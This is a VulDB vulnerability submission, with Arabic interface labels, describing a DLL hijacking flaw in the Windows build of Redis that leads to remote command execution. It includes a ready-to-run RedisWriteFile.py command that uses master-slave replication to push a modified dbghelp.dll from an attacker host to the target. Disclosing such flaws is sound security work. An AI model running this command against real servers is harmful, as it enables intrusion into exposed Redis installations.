| عنوان | Redis On Windows DLL Hijacking Result in RCE When Unauthorized |
|---|
| الوصف | There is a dll hijacking vulnerability in the Windows version of Redis.
When Redis has unauthorized access or password disclosure, attackers can use dll writing to implement system remote command execution using the Windows version of Redis.
Use RedisWriteFile to write the modified dbghelp.dll to the designated location of the target using master slave replication.
python3 RedisWriteFile.py --rhost=192.168.41.29 --rport=6379 --lhost=192.168.41.38 --rpath="C:/Program Files/Redis/" --rfile="dbghelp.dll" --lfile="dbghelp.dll"
details can be seen on https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| المصدر | ⚠️ https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| المستخدم | J0o1ey (UID 30618) |
|---|
| ارسال | 26/10/2022 12:05 PM (3 سنوات منذ) |
|---|
| الاعتدال | 28/10/2022 07:39 AM (2 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 212416 [Redis على Windows dbghelp.dll تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|